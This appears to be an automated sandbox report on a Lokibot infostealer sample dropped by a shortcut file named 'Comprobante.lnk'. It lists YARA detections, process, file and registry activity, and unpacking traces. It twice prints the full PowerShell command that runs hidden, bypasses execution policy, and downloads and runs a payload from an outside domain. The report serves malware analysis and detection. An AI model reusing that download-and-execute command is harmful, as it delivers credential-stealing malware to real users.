Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: mjtjewi.exe.0.dr

Static PE information: Section: j1CM!e^U ZLIB complexity 1.0003301933811801

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@12/10@3/2

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

6_2_0040434D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\mjtjewi.exe

Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\mjtjewi.exe	Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Comprobante.lnk.lnk

LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\mjtjewi.exe

Unpacked PE file: 4.2.mjtjewi.exe.b70000.0.unpack j1CM!e^U:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';

Yara detected aPLib compressed binary

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
